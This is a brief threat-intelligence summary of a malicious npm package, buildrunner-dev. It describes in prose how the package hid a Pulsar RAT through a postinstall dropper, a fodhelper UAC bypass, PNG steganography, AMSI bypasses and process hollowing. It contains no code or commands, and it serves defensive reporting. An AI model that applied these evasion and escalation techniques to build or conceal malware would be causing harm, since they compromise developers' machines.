A technical analysis by Veracode reported that a malicious NPM package named buildrunner-dev drops an obfuscated 1,653 line batch loader and hides encrypted payloads inside PNG images, including a 59,176 byte payload that decompressed to a 136 KB .NET loader and a 976 KB Pulsar RAT.
KEY FACTS
- Incident A typosquatted NPM package named buildrunner-dev was published with a postinstall downloader
- Delivery Postinstall hook fetched a batch dropper and wrote a persistent copy to the Windows Startup folder
- Technique Payloads were embedded in RGB pixel values of PNG images hosted on i.ibb.co
- Final payload Extraction produced a .NET loader and a Pulsar Remote Access Trojan
The dropper was a heavily obfuscated batch script with over 1,600 lines and about 909 small variables that concatenate at runtime to form a PowerShell downloader. The script copies itself to %AppData% as protect.bat and installs persistence in the Startup folder.
The loader attempts privilege elevation using a fodhelper UAC bypass linked to MITRE technique T1548.002 by adding temporary registry protocol handlers and launching fodhelper.exe to execute the dropper with elevated rights. Registry keys are removed after escalation.
Downloaded PNG images contain steganographic data where the first two pixels encode payload size and subsequent pixels store three bytes per pixel in R, G and B channels. One image held an obfuscated PowerShell AMSI patch, another contained a GZip compressed .NET assembly that acts as a process hollowing loader.
The .NET loader implements process hollowing, multiple AMSI bypass techniques including a vectored exception handler using hardware breakpoints and a direct memory patch, dynamic API resolution without imports, AES and TripleDES decryption of staged payloads, and per antivirus persistence logic. The final extracted payload was the Pulsar RAT.
WHY IT MATTERS
This campaign demonstrates supply chain risk for open source packages and how steganography plus layered obfuscation and encryption can hide multi‑stage payloads from detection. Environments using default package sources and lacking runtime protections are at heightened risk.